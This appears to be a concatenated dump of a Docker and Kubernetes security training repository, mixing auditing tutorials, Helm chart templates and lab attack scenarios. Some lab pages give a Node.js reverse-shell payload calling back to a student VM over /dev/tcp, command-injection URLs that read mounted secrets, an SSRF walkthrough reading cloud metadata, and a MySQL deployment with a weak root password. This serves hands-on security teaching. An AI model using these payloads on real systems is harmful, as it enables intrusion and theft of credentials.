6 | 7 | 8 | * Your weapon to attack this scenario is the popular `nmap` tool -------------------------------------------------------------------------------- /gitbook/advanced-concepts/docker-volumes-and-networks.md: -------------------------------------------------------------------------------- 1 | # Docker volumes and networks 2 | 3 | ## Checking for the docker volumes 4 | 5 | * Listing the docker volumes 6 | 7 | ```bash 8 | docker volume ls 9 | ``` 10 | 11 | ![docker volumes](images/docker-volumes.png) 12 | 13 | 14 | * Creating new docker volume 15 | 16 | ```bash 17 | docker volume create c0c0n 18 | ``` 19 | 20 | ## Checking for the docker networks 21 | 22 | * Listing the docker networks 23 | 24 | ```bash 25 | docker network ls 26 | ``` 27 | 28 | ![docker networks](images/docker-networks.png) 29 | 30 | 31 | * Creating new docker network 32 | 33 | ```bash 34 | docker network create c0c0n 35 | ``` -------------------------------------------------------------------------------- /gitbook/extra/play-with-docker.md: -------------------------------------------------------------------------------- 1 | # Play with Docker 2 | 3 | The Play with Docker classroom brings you labs and tutorials that help you get hands-on experience using Docker. In this classroom you will find a mix of labs and tutorials that will help Docker users, including SysAdmins, IT Pros, and Developers. There is a mix of hands-on tutorials right in the browser, instructions on setting up and using Docker in your own environment, and resources about best practices for developing and deploying your own applications. 
4 | 5 | ![Play with Docker](images/play-with-docker.png) 6 | 7 | ### References 8 | 9 | * [https://training.play-with-docker.com](https://training.play-with-docker.com/) -------------------------------------------------------------------------------- /gitbook/scenario-6/scenario.md: -------------------------------------------------------------------------------- 1 | # Attacking Helm tiller without RBAC setup - Scenario 2 | 3 | Bob has managed to gain access to a pod inside a K8S cluster. Bob knows that Helm v2's Tiller is frequently deployed without any RBAC restriction on who may talk to it, while its own service account is often bound to `cluster-admin`. 4 | 5 | Bob knows that he should be able to get the Kubernetes cluster admin access by using Helm and the Tiller service, since anything Tiller deploys runs with Tiller's privileges. 6 | 7 | Let's help Bob get the cluster admin access out of this cluster! 8 | 9 | ## Tips 10 | 11 | * You can run the below command to get shell with enough tools to get cluster admin access 12 | 13 | ```bash 14 | kubectl run -n default --quiet --rm --restart=Never -ti --image=madhuakula/helm-security incluster 15 | ``` -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/server-health/templates/tests/test-connection.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: "{{ include "server-health.fullname" . }}-test-connection" 5 | labels: 6 | app.kubernetes.io/name: {{ include "server-health.name" . }} 7 | helm.sh/chart: {{ include "server-health.chart" . }} 8 | app.kubernetes.io/instance: {{ .Release.Name }} 9 | app.kubernetes.io/managed-by: {{ .Release.Service }} 10 | annotations: 11 | "helm.sh/hook": test-success 12 | spec: 13 | containers: 14 | - name: wget 15 | image: busybox 16 | command: ['wget'] 17 | args: ['{{ include "server-health.fullname" . 
}}:{{ .Values.service.port }}'] 18 | restartPolicy: Never 19 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/mailbox-service/templates/tests/test-connection.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: "{{ include "mailbox-service.fullname" . }}-test-connection" 5 | labels: 6 | app.kubernetes.io/name: {{ include "mailbox-service.name" . }} 7 | helm.sh/chart: {{ include "mailbox-service.chart" . }} 8 | app.kubernetes.io/instance: {{ .Release.Name }} 9 | app.kubernetes.io/managed-by: {{ .Release.Service }} 10 | annotations: 11 | "helm.sh/hook": test-success 12 | spec: 13 | containers: 14 | - name: wget 15 | image: busybox 16 | command: ['wget'] 17 | args: ['{{ include "mailbox-service.fullname" . }}:{{ .Values.service.port }}'] 18 | restartPolicy: Never 19 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/server-health/templates/service.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: {{ include "server-health.fullname" . }} 5 | labels: 6 | app.kubernetes.io/name: {{ include "server-health.name" . }} 7 | helm.sh/chart: {{ include "server-health.chart" . }} 8 | app.kubernetes.io/instance: {{ .Release.Name }} 9 | app.kubernetes.io/managed-by: {{ .Release.Service }} 10 | spec: 11 | type: {{ .Values.service.type }} 12 | ports: 13 | - port: {{ .Values.service.port }} 14 | targetPort: http 15 | protocol: TCP 16 | name: http 17 | selector: 18 | app.kubernetes.io/name: {{ include "server-health.name" . 
}} 19 | app.kubernetes.io/instance: {{ .Release.Name }} 20 | -------------------------------------------------------------------------------- /gitbook/advanced-concepts/portainer.md: -------------------------------------------------------------------------------- 1 | # Portainer 2 | 3 | Portainer is a simple management solution for Docker. Easily manage your Docker hosts and Docker Swarm clusters via Portainer web user interface. 4 | 5 | * Run portainer using the below command. Note that it mounts the Docker socket into the container, which gives Portainer (and anyone who controls its UI) root-equivalent control over the host, and `-p 9000:9000` exposes the UI on every interface; set the admin password immediately on first access and, outside this lab, bind it to localhost (`-p 127.0.0.1:9000:9000`) or restrict who can reach port 9000 6 | 7 | ```bash 8 | docker run -d -p 9000:9000 --name portainer \ 9 | --restart always -v /var/run/docker.sock:/var/run/docker.sock \ 10 | -v /opt/portainer:/data portainer/portainer 11 | ``` 12 | 13 | ![run portainer](images/run-portainer.png) 14 | 15 | * Now you can access portainer at http://STUDENTVMIP:9000 16 | 17 | ![portainer setup](images/portainer-setup.png) 18 | 19 | ![portainer setup](images/portainer-select.png) 20 | 21 | ![Portainer Dashboard](images/portainer-dashboard.png) -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/connectivity-check/templates/tests/test-connection.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: "{{ include "connectivity-check.fullname" . }}-test-connection" 5 | labels: 6 | app.kubernetes.io/name: {{ include "connectivity-check.name" . }} 7 | helm.sh/chart: {{ include "connectivity-check.chart" . }} 8 | app.kubernetes.io/instance: {{ .Release.Name }} 9 | app.kubernetes.io/managed-by: {{ .Release.Service }} 10 | annotations: 11 | "helm.sh/hook": test-success 12 | spec: 13 | containers: 14 | - name: wget 15 | image: busybox 16 | command: ['wget'] 17 | args: ['{{ include "connectivity-check.fullname" . 
}}:{{ .Values.service.port }}'] 18 | restartPolicy: Never 19 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/mailbox-service/templates/service.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: {{ include "mailbox-service.fullname" . }} 5 | labels: 6 | app.kubernetes.io/name: {{ include "mailbox-service.name" . }} 7 | helm.sh/chart: {{ include "mailbox-service.chart" . }} 8 | app.kubernetes.io/instance: {{ .Release.Name }} 9 | app.kubernetes.io/managed-by: {{ .Release.Service }} 10 | spec: 11 | type: {{ .Values.service.type }} 12 | ports: 13 | - port: {{ .Values.service.port }} 14 | targetPort: http 15 | protocol: TCP 16 | name: http 17 | selector: 18 | app.kubernetes.io/name: {{ include "mailbox-service.name" . }} 19 | app.kubernetes.io/instance: {{ .Release.Name }} 20 | -------------------------------------------------------------------------------- /gitbook/kubeaudit/readme.md: -------------------------------------------------------------------------------- 1 | # Running kubeaudit 2 | 3 | kubeaudit is a command line tool to audit Kubernetes clusters for various different security concerns: 4 | * run the container as a non-root user 5 | * use a read only root filesystem 6 | * drop scary capabilities 7 | * don't add new ones 8 | * don't run privileged 9 | * etc. 
10 | 11 | ## How to run kubeaudit 12 | 13 | * Running the `kubeaudit` with all checks 14 | 15 | ```bash 16 | cd /data/kubeaudit 17 | ./kubeaudit all 18 | ``` 19 | 20 | ![](images/kubeaudit.png) 21 | 22 | 23 | > We can also use `kubeaudit` to fix vulnerabilities in a live cluster `*Not recommended for production` 24 | 25 | ### References 26 | 27 | * [https://github.com/Shopify/kubeaudit](https://github.com/Shopify/kubeaudit) -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/connectivity-check/templates/service.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: {{ include "connectivity-check.fullname" . }} 5 | labels: 6 | app.kubernetes.io/name: {{ include "connectivity-check.name" . }} 7 | helm.sh/chart: {{ include "connectivity-check.chart" . }} 8 | app.kubernetes.io/instance: {{ .Release.Name }} 9 | app.kubernetes.io/managed-by: {{ .Release.Service }} 10 | spec: 11 | type: {{ .Values.service.type }} 12 | ports: 13 | - port: {{ .Values.service.port }} 14 | targetPort: http 15 | protocol: TCP 16 | name: http 17 | selector: 18 | app.kubernetes.io/name: {{ include "connectivity-check.name" . 
}} 19 | app.kubernetes.io/instance: {{ .Release.Name }} 20 | -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/docker-integrity-check.md: -------------------------------------------------------------------------------- 1 | # Docker integrity check for containers 2 | 3 | * We can list the changed files and directories in a containers filesystem 4 | * There are 3 events that are listed in the diff 5 | * A - Add 6 | * D - Delete 7 | * C - Change 8 | 9 | 10 | ## Demonstration 11 | 12 | * Let's run a ubuntu container and perform some changes 13 | 14 | ```bash 15 | docker run --name checkintegriy -it ubuntu:latest bash 16 | mkdir -p /data/output 17 | echo "modifed this stuff" > /.dockerenv 18 | exit 19 | ``` 20 | 21 | ![docker perfrom changes](images/docker-perform-changes.png) 22 | 23 | * Now lets see the diff using the following command 24 | 25 | ```bash 26 | docker diff checkintegriy 27 | ``` 28 | 29 | ![](images/docker-diff-changes.png) -------------------------------------------------------------------------------- /gitbook/docker-events/README.md: -------------------------------------------------------------------------------- 1 | # Docker Events 2 | 3 | Docker events generates real time events from the server. 
4 | 5 | 6 | * Looking for the global events generated by the docker runtime 7 | 8 | ```bash 9 | docker system events 10 | ``` 11 | 12 | ![docker system events](images/docker-system-events.png) 13 | 14 | 15 | * Filter events based on time 16 | 17 | ```bash 18 | docker events --since '10m' 19 | ``` 20 | 21 | * Filter events based on image 22 | 23 | ```bash 24 | docker events --filter 'image=alpine' 25 | ``` 26 | 27 | * Filter events based on event type 28 | 29 | ```bash 30 | docker events --filter 'event=stop' 31 | ``` 32 | 33 | ### References 34 | 35 | * [docker events](https://docs.docker.com/engine/reference/commandline/events/) 36 | * [Using docker events with code](http://crosbymichael.com/docker-events.html) -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/amicontained.md: -------------------------------------------------------------------------------- 1 | # amicontained 2 | 3 | This is a container introspection tool that lets you find out what container runtime is being used as well as the features available. 
4 | 5 | * Docker container running with default settings (no extra privileges) 6 | 7 | ```bash 8 | docker run --rm -it r.j3ss.co/amicontained -d 9 | ``` 10 | 11 | ![docker no privileges](images/docker-no-privileges.png) 12 | 13 | * Docker container sharing the host PID namespace (`--pid host`); compare the output with the previous run 14 | 15 | ```bash 16 | docker run --rm -it --pid host r.j3ss.co/amicontained -d 17 | ``` 18 | 19 | ![docker host privileges](images/docker-host-privileges.png) 20 | 21 | * Docker container running with the AppArmor profile disabled via the `--security-opt apparmor=unconfined` security option 22 | 23 | ```bash 24 | docker run --rm -it --security-opt "apparmor=unconfined" r.j3ss.co/amicontained -d 25 | ``` 26 | 27 | ![docker apparmor profile](images/docker-apparmor-profile.png) -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/docker-runtime-endpoints.md: -------------------------------------------------------------------------------- 1 | # Auditing Docker Runtime and Endpoints 2 | 3 | * Checking for the docker daemon configuration 4 | 5 | ```bash 6 | docker system info 7 | ``` 8 | 9 | ![docker system info](images/docker-system-info.png) 10 | 11 | * Checking whether the docker API is exposed over TCP on `0.0.0.0` (look for a `-H tcp://...` option on the `ExecStart` line of the unit file) 12 | 13 | ```bash 14 | sudo cat /lib/systemd/system/docker.service 15 | ``` 16 | 17 | ![docker using tcp socket](images/docker-tcp-socket.png) 18 | 19 | * Checking if the docker socket is mounted into any running container 20 | 21 | ```bash 22 | docker inspect $(docker ps -q) | grep -i '/var/run/' 23 | ``` 24 | 25 | ![docker inspect for socket](images/docker-inspect-for-socket.png) 26 | 27 | * Checking other files and data related to docker 28 | 29 | ```bash 30 | sudo ls -l /var/lib/docker/ 31 | ``` 32 | 33 | ![docker system files and data](images/docker-data-files.png) -------------------------------------------------------------------------------- /gitbook/getting-started/vuln-apps.md: -------------------------------------------------------------------------------- 1 | # Vulnerable Apps 2 | 3 | Each student cluster has 
intentionally vulnerable apps running which will be used during lab scenarios. The apps are available in following URLs 4 | 5 | ``` 6 | http://mailbox-service.oss-k8s-security.cloudsec.training 7 | http://server-health.oss-k8s-security.cloudsec.training 8 | http://connectivity-check.oss-k8s-security.cloudsec.training 9 | ``` 10 | 11 | **NOTE:** All attacks described in this document must be executed from Kubernetes Student VM. 12 | 13 | The apps are accessible from Student VM after you setup port forward locally. Open a terminal in Student VM and execute the command below to setup a port forward into the cluster. 14 | 15 | ``` 16 | sudo kubectl port-forward -n kube-system svc/nginx-ingress-controller 80:80 17 | ``` 18 | 19 | Now you can navigate to the vulnerable applications by URL given above. -------------------------------------------------------------------------------- /infra-setup/apps-ingress/apps-ingress.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: extensions/v1beta1 2 | kind: Ingress 3 | metadata: 4 | name: apps-ingress 5 | annotations: 6 | kubernetes.io/ingress.class: nginx 7 | nginx.ingress.kubernetes.io/rewrite-target: / 8 | spec: 9 | rules: 10 | - host: mailbox-service.oss-k8s-security.cloudsec.training 11 | http: 12 | paths: 13 | - path: / 14 | backend: 15 | serviceName: mailbox-service 16 | servicePort: 80 17 | - host: server-health.oss-k8s-security.cloudsec.training 18 | http: 19 | paths: 20 | - path: / 21 | backend: 22 | serviceName: server-health 23 | servicePort: 80 24 | - host: connectivity-check.oss-k8s-security.cloudsec.training 25 | http: 26 | paths: 27 | - path: / 28 | backend: 29 | serviceName: connectivity-check 30 | servicePort: 80 31 | -------------------------------------------------------------------------------- /gitbook/scenario-1/scenario.md: -------------------------------------------------------------------------------- 1 | # Exploiting Private Registry via 
Misconfiguration - Scenario 2 | 3 | Bob's company has deployed a new mail application for them to use. Alas, this application is riddled with bugs! Most of which arise from default configurations and poor programming practices. There has been speculation that the internal team did not even remove the readme file for this application! 4 | 5 | In any case, as an attacker you know that the application is deployed using docker. Can we use a vulnerability to read files that we are not meant to and see what the docker private registry looks like? Who knows what secrets you may find! 6 | 7 | ## Tips 8 | 9 | * Endpoint for your attack is `http://mailbox-service.student-uniquename.cloudsec.training`. Replace `uniquename` with your unique name 10 | * The login credentials for the application are `username: bob` and `password: bobmailbox` 11 | * `README.md` exists 12 | * The app is vulnerable to `LFI` -------------------------------------------------------------------------------- /infra-setup/secrets-db-service/secrets-db-service.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Namespace 3 | metadata: 4 | name: database 5 | --- 6 | apiVersion: v1 7 | kind: Service 8 | metadata: 9 | namespace: database 10 | name: secrets-db-service 11 | spec: 12 | ports: 13 | - protocol: TCP 14 | port: 3306 15 | targetPort: 3306 16 | selector: 17 | app: secrets-db 18 | --- 19 | apiVersion: apps/v1 20 | kind: Deployment 21 | metadata: 22 | namespace: database 23 | name: secrets-db-deployment 24 | labels: 25 | app: secrets-db 26 | spec: 27 | selector: 28 | matchLabels: 29 | app: secrets-db 30 | template: 31 | metadata: 32 | labels: 33 | app: secrets-db 34 | spec: 35 | containers: 36 | - name: secrets-db 37 | image: mysql:5.7 38 | env: 39 | - name: MYSQL_ROOT_PASSWORD 40 | value: "secret" 41 | ports: 42 | - containerPort: 3306 43 | 44 | -------------------------------------------------------------------------------- 
/gitbook/attacking-insecure-volume-mounts/scenario.md: -------------------------------------------------------------------------------- 1 | # Attacking insecure volume mounts - Scenario 2 | 3 | In this scenario we will be exploiting a NodeJS application using remote code execution to gain a reverse shell. Then we will use the volume mounted `docker.sock` to gain privileges in the host system with docker runtime. 4 | 5 | * The application is running at CTF VM. You can access it by navigating to `http://CTFVMIP` 6 | 7 | ![node app home page](images/insecure-mount-node-app.png) 8 | 9 | * This NodeJS application is vulnerable to remote code execution (RCE) in `q` GET parameter. Access the endpoint using `http://CTFVMIP/?q="docker"` 10 | 11 | ![vulnerable parameter](images/insecure-mount-vulnerable-parameter.png) 12 | 13 | * To exploit this RCE, we will be using below payload. Here `192.168.56.3` need to replace with your student VM IP 14 | 15 | ```bash 16 | require("child_process").exec('bash -c "bash -i >%26 /dev/tcp/192.168.56.3/5555 0>%261"') 17 | ``` -------------------------------------------------------------------------------- /gitbook/attacking-docker-containers/README.md: -------------------------------------------------------------------------------- 1 | # Attacking Docker Containers - Scenarios 2 | 3 | In this section we will be attacking the containers to gain access to the host system, data and assets. 4 | 5 | * Attacking contianer capabilities 6 | * Attacking insecure volume mounts in containers 7 | * Attacking runtime misconfigurations 8 | * Exploiting docker secrets misconfiguration 9 | 10 | `Docker Escape` is the term used to define vulnerabilities, weaknesses and their exploitation technique that allows an attacker to bypass the various restrictions enforced by the container runtime. 
11 | 12 | An escape happens when an attacker having access to execute arbitrary command inside a container is able to access or execute commands on the host system, outside the container namespace restrictions. 13 | 14 | > For this section, we assume that an attacker has already gained access to execute commands inside a container by exploiting some vulnerability in app deployed in the container. -------------------------------------------------------------------------------- /gitbook/scenario-3/scenario.md: -------------------------------------------------------------------------------- 1 | # Testing for the sensitive configurations and secrets in Kubernetes cluster - Scenario 2 | 3 | Bob's company has deployed their code base to production Kubernetes cluster. Alas, this application has secrets which gives access to their AWS Cloud and other API endpoints! Most of which arise from default configurations, misconfigurations and bad programming practices. There has been speculation that the team directly deploys code from version control system to production! 4 | 5 | In any case, as an attacker you know that the application is deployed in Kubernetes, which contains secrets to access the different cloud provider, API endpoints. Who knows what all secrets you may find! 6 | 7 | ## Tips 8 | 9 | * Execute below command to start a shell into the pod to get started 10 | 11 | ```bash 12 | export CODEBASE_POD_NAME=$(kubectl get pods --selector app=code-base -o jsonpath="{.items[0].metadata.name}") 13 | kubectl exec -it $CODEBASE_POD_NAME sh 14 | ``` -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/docker-bench-security-audit.md: -------------------------------------------------------------------------------- 1 | # Docker Bench Security Audit 2 | 3 | Docker Bench for Security is a shell script to perform multiple checks against the Docker container environment. 
It will give a detailed view of the security configuration based on CIS benchmarks. This script supports most of the Unix operating systems as it was built based on the POSIX 2004 compliant. 4 | 5 | More details about the tool information can be found at https:/​/github.​com/​docker/docker-​bench-​security 6 | 7 | The following are the high-level areas of checks this script will perform 8 | 9 | * Host configuration 10 | * Docker daemon configuration and files 11 | * Docker container images 12 | * Docker runtime 13 | * Docker security operations 14 | * Docker swarm configuration 15 | 16 | 17 | ## Running docker bench security 18 | 19 | Now lets perform the audit 20 | 21 | ```bash 22 | cd /opt/docker-bench-security 23 | sudo bash docker-bench-security.sh 24 | ``` 25 | 26 | ![Docker Bench Security](images/docker-bench-security.png) -------------------------------------------------------------------------------- /gitbook/demos/cve-2019-5736.md: -------------------------------------------------------------------------------- 1 | # CVE-2019-5736 - Escape from Docker and Kubernetes containers to root on host 2 | 3 | This scenario demos has been taken from [https://github.com/Frichetten/CVE-2019-5736-PoC](https://github.com/Frichetten/CVE-2019-5736-PoC). Thanks to [Nick Frichette](https://frichetten.com/) 4 | 5 | This is a Go implementation of CVE-2019-5736, a container escape for Docker. The exploit works by overwriting and executing the host systems runc binary from within the container. 6 | 7 | ## How does the exploit work? 
8 | 9 | ![](images/CVE-2019-5736_1.gif) 10 | 11 | ## Example of malicious Docker image 12 | 13 | ![](images/CVE-2019-5736_2.gif) 14 | 15 | 16 | ### References 17 | 18 | * [CVE-2019-5736: runc container breakout exploit code](https://www.openwall.com/lists/oss-security/2019/02/13/3) 19 | * [CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html) 20 | * [CVE-2019-5736-PoC](https://github.com/Frichetten/CVE-2019-5736-PoC) -------------------------------------------------------------------------------- /gitbook/popular-attacks/cryptojacking.md: -------------------------------------------------------------------------------- 1 | # Cryptojacking using public docker containers 2 | 3 | Kromtech Security Center found 17 malicious docker images stored on Docker Hub for an entire year. Even after several complaints on GitHub and Twitter, research made by sysdig.com and fortinet.com, cybercriminals continued to enlarge their malware armory on Docker Hub. With more than 5 million pulls, the `docker123321` registry is considered a springboard for cryptomining containers. Today’s growing number of publicly accessible misconfigured orchestration platforms like Kubernetes allows hackers to create a fully automated tool that forces these platforms to mine Monero. By pushing malicious images to a Docker Hub registry and pulling it from the victim’s system, hackers were able to mine `544.74` Monero, which is equal to `$90000`. 4 | 5 | 6 | * Read more about [Cryptojacking invades cloud. 
How modern containerization trend is exploited by attackers](https://kromtech.com/blog/security-center/cryptojacking-invades-cloud-how-modern-containerization-trend-is-exploited-by-attackers) -------------------------------------------------------------------------------- /gitbook/exploiting-cluster-secrets/solution.md: -------------------------------------------------------------------------------- 1 | # Exploiting Cluster Secrets 2 | 3 | * The application running in the CTF VM has code execution vulnerability `http://CTFVMIP:8080/?domain=;id` and is running in docker swarm as service with attached secrets 4 | 5 | ![accessing the docker swarm app](images/access-docker-swarm-app.png) 6 | 7 | * We can access the application container's environment variables using the `printenv` command by visiting `http://CTFVMIP:8080/?domain=;printenv` 8 | 9 | ![access docker swarm environment variables](images/access-docker-swarm-env.png) 10 | 11 | * We can explore the directories further `http://CTFVMIP:8080/?domain=;ls -l /run/` 12 | 13 | ![docker swarm app search locations](images/docker-swarm-search-locations.png) 14 | 15 | * The secrets are mounted via `docker secrets` at `/var/run/` or `/run/`. We can access them by visiting `http://CTFVMIP:8080/?domain=;cat /run/secrets/data_api_key` 16 | 17 | ![docker secret access data](images/docker-secrets-default-location.png) 18 | 19 | * A similar approach can be user for `docker swarm` and `kubernetes` cluster environments 20 | -------------------------------------------------------------------------------- /MIT-LICENSE.txt: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) [2020] [Appsecco Ltd.] 
4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /gitbook/scenario-2/solution.md: -------------------------------------------------------------------------------- 1 | # Attacking Kubernetes cluster Metadata using application SSRF vulnerability - Solution 2 | 3 | * Navigate to the application `http://server-health.student-uniquename.cloudsec.training` 4 | 5 | * Login to the application using `username: serveradmin` and `password: monitorworld` 6 | 7 | ![](images/app-login.png) 8 | 9 | * The application supports functionality to check server health. 
Let's give `https://icanhazip.com` to check the public IP address 10 | 11 | ![](images/check-ip.png) 12 | 13 | * As this setup is running on GCP, we can query the internal metadata using the standard endpoint `http://169.254.169.254/computeMetadata/v1/` 14 | 15 | ![](images/internal-metadata.png) 16 | 17 | * Similarly we can query all the sensitive information, including the Kubernetes secrets and other information related to Cloud Platform `http://169.254.169.254/computeMetadata/v1/instance/attributes/kube-env` 18 | 19 | ![](images/kube-env-metadata.png) 20 | 21 | * Also, we can find the flag by `http://169.254.169.254/computeMetadata/v1/instance/attributes/flag` 22 | 23 | ```bash 24 | 59a4c760306d682ca75d690bebb9db0e 25 | ``` 26 | 27 | ![](images/flag-metadata.png) -------------------------------------------------------------------------------- /gitbook/docker-logging/README.md: -------------------------------------------------------------------------------- 1 | # Docker Logging 2 | 3 | The `docker logs` command shows information logged by a running container. The `docker service logs` command shows information logged by all containers participating in a service. The information that is logged and the format of the log depends almost entirely on the container's endpoint command. 
4 | 5 | ## Examples 6 | 7 | * Fetch the logs of a container 8 | 9 | ```bash 10 | docker logs containername 11 | 12 | # follow the stream 13 | docker logs -f containername 14 | ``` 15 | 16 | * Retrieve logs until a specific point in time 17 | 18 | ```bash 19 | docker run --name testlogs -d ubuntu sh -c "while true; do $(echo date); sleep 1; done" 20 | 21 | date 22 | Mon Oct 1 17:12:27 IST 2018 23 | 24 | docker logs -f --until=2s testlogs 25 | Mon Oct 1 11:41:36 UTC 2018 26 | Mon Oct 1 11:41:37 UTC 2018 27 | Mon Oct 1 11:41:38 UTC 2018 28 | ``` 29 | 30 | ![docker logs with filters](images/docker-logs-with-filters.png) 31 | 32 | ### Reference 33 | 34 | * [docker logs](https://docs.docker.com/v17.12/engine/reference/commandline/logs/) 35 | * [Logging with Docker](https://medium.com/@yoanis_gil/logging-with-docker-part-1-b23ef1443aac) -------------------------------------------------------------------------------- /gitbook/scenario-5/scenario.md: -------------------------------------------------------------------------------- 1 | # Attacking applications in different namespaces in Kubernetes cluster - Scenario 2 | 3 | Bob's friend in IT, Kevin manages the Kubernetes cluster for his company along with his teammate James. It's a little sad, but Kevin and James do not share their work with each other. 4 | 5 | It turns out James has setup a MySQL server on the same Kubernetes cluster but on a different namespace. But given that they are both on the same Kubernetes cluster, they appear to be on the same network! Well that is because, most Kubernetes clusters are setup without network segregation between namespaces. 6 | 7 | Can you help Kevin gain access to James' MySQL server to see what shady secrets he has been hiding? 8 | 9 | ## Tips 10 | 11 | By default, Kubernetes does not restrict traffic between pods running inside the cluster. This means any pod can connect to any other pod as there are no firewalls controlling the intra-cluster traffic. 
* Execute the commands below to get a shell into the pod to get started
4 | 5 | The primary users of the LSM interface are Mandatory Access Control (MAC) extensions which provide a comprehensive security policy. Examples include SELinux, Smack, Tomoyo, and AppArmor. 6 | 7 | ## LSM Demonstration 8 | 9 | * Let's run a simple nginx container 10 | 11 | ```bash 12 | docker run --rm -it --name lsm-before -p 4321:80 nginx bash 13 | 14 | sh 15 | dash 16 | bash 17 | ``` 18 | 19 | ![lsm before nginx](images/lsm-before.png) 20 | 21 | 22 | * Now lets apply the apparmor profile for the container and see if we can perform other operations like `sh` and `dash` 23 | 24 | ```bash 25 | cd /opt/docker-nginx 26 | 27 | sudo bane sample.toml 28 | 29 | docker run --rm -it --name lsm-after \ 30 | --security-opt="apparmor:docker-nginx-sample" -p 4320:80 nginx bash 31 | 32 | sh 33 | dash 34 | bash 35 | ``` 36 | 37 | ![lsm after nginx](images/lsm-after.png) 38 | 39 | 40 | * Have a look at `cat /opt/docker-nginx/docker-nignx-sample` file for the apparmor profile that was created using [bane](https://github.com/genuinetools/bane) -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/docker-management.md: -------------------------------------------------------------------------------- 1 | # Docker Management 2 | 3 | There are different commands which will be very handy while using and managing docker containers. 
4 | 5 | ## Inspecting container or image 6 | 7 | * Returns low-level information on Docker objects 8 | 9 | ```bash 10 | docker inspect 11 | docker inspect 12 | ``` 13 | 14 | * Let's inspect the `nginx:alpine` image 15 | 16 | ```bash 17 | docker inspect nginx:alpine 18 | ``` 19 | 20 | ![docker inspect nginx](images/docker-inspect-nginx.png) 21 | 22 | ## Docker history 23 | 24 | * Show the history of an image 25 | 26 | ``` 27 | docker history jess/htop 28 | ``` 29 | 30 | ![docker history](images/docker-history.png) 31 | 32 | ## Stoping and remove container 33 | 34 | * Let's run a nginx container 35 | 36 | ```bash 37 | docker run --name dummynginx -d nginx:alpine 38 | ``` 39 | 40 | * Identify the container name or id using `docker ps` 41 | 42 | ```bash 43 | docker stop dummynginx 44 | ``` 45 | 46 | * To remove container, it has to be stopped. Then runt he below command 47 | 48 | ```bash 49 | docker rm dummynginx 50 | ``` 51 | 52 | ![docker stop and remove](images/docker-stop-and-remove.png) 53 | -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/docker-volumes-networks.md: -------------------------------------------------------------------------------- 1 | # Auditing Docker Volumes and Networks 2 | 3 | ## Listing and inspecting the docker volumes 4 | 5 | * Listing docker volumes 6 | 7 | ```bash 8 | docker volume ls 9 | ``` 10 | 11 | ![docker volume ls](images/docker-volume-ls.png) 12 | 13 | * Inspecting docker volumes 14 | 15 | ```bash 16 | docker volume inspect wordpress_db_data 17 | ``` 18 | 19 | ![docker volume inspect](images/docker-volume-inspect.png) 20 | 21 | * Volumes can be used with Ready-Only, Read-Write modes 22 | 23 | 24 | ## Listing and inspecting the docker networks 25 | 26 | * Docker by default creates it's own networking namespace when we use Docker Swarm or Docker Compose 27 | 28 | * By default bridge, host, null networking options are available 29 | 30 | * Listing the docker networks 
31 | 32 | ```bash 33 | docker network ls 34 | ``` 35 | 36 | ![docker network ls](images/docker-network-ls.png) 37 | 38 | * Inspecting the docker network 39 | 40 | ```bash 41 | docker inspect wordpress_default 42 | ``` 43 | 44 | ![docker network inspect](images/docker-network-inspect.png) 45 | 46 | 47 | > We can use our traditional toolset like `nmap` (or) `nc` for performing scans and information gathering -------------------------------------------------------------------------------- /gitbook/extra/exploiting-cluster-secrets.md: -------------------------------------------------------------------------------- 1 | # Exploiting Cluster Secrets 2 | 3 | In this scenario we will see how we will exploit an application to access docker swarm cluster secrets. 4 | 5 | 6 | * The application running in the CTF VM has code execution vulnerability `http://CTFVMIP:8080/?domain=;id` and is running in docker swarm as service with attached secrets 7 | 8 | ![accessing the docker swarm app](images/access-docker-swarm-app.png) 9 | 10 | * We can access the application container's environment variables using the `printenv` command by visiting `http://CTFVMIP:8080/?domain=;printenv` 11 | 12 | ![access docker swarm environment variables](images/access-docker-swarm-env.png) 13 | 14 | * We can explore the directories further 